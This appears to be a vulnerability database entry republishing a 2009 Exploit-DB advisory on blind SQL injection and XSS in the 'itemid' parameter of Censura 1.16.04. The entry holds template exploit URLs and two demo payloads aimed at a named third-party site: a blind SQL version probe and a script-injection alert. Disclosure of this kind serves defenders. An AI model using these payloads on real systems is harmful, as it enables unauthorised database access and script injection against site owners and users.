(Blind SQL/XSS) Multiple Remote Vulnerabilities

vendor:

Censura

by:

Vrs-hCk

9,3

CVSS

HIGH

Blind SQL/XSS

89, 79

CWE

Product Name: Censura

Affected Version From: 1.16.04

Affected Version To: 1.16.04

Patch Exists: NO

Related CWE: N/A

CPE: a:censura:censura:1.16.04

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

(Blind SQL/XSS) Multiple Remote Vulnerabilities

A vulnerability exists in Censura v1.16.04, which can be exploited by malicious people to conduct SQL injection and XSS attacks. The vulnerability is caused due to the 'itemid' parameter in 'censura.php' not being properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Successful exploitation of the SQL injection vulnerability may allow execution of arbitrary SQL commands. Successful exploitation of the XSS vulnerability may allow execution of arbitrary HTML and script code in a user's browser session in context of an affected site.

Mitigation:

Input validation should be used to prevent SQL injection and XSS attacks.

Source

Exploit-DB raw data:

================================================================================================

 Title    : (Blind SQL/XSS) Multiple Remote Vulnerabilities
 Software : Censura v1.16.04
 Vendor   : http://www.censura.info/
 
 Date     : 12 July 2009 (Indonesia)
 Author   : Vrs-hCk
 Contact  : d00r@telkom.net
 Blog     : http://c0li.blogspot.com/

 ================================================================================================

 [-] Exploit

     http://[site]/[path]/censura.php?cmd=details&itemid=[bSQL]
     http://[site]/[path]/censura.php?cmd=details&itemid=[XSS]

 [-] Demo

     http://www.yoozreviews.com/censura.php?cmd=details&itemid=61 and substring(@@version,1,1)=4
     http://www.yoozreviews.com/censura.php?cmd=details&itemid=<script>alert(123)</script>

 ================================================================================================

 Greetz   :

     Paman, NoGe, OoN_Boy, Angela Chang, pizzyroot, zxvf, ajegille, em|nem, loqsa, Fluzy,
     bl4Ck_3n91n3, H312Y, S3T4N, Janroe, and special muaacchh buat Dia yg Ku Cintai (*_^)
     c0li.m0de.0n and Behave oR BeGone !!!

 ================================================================================================

# milw0rm.com [2009-07-12]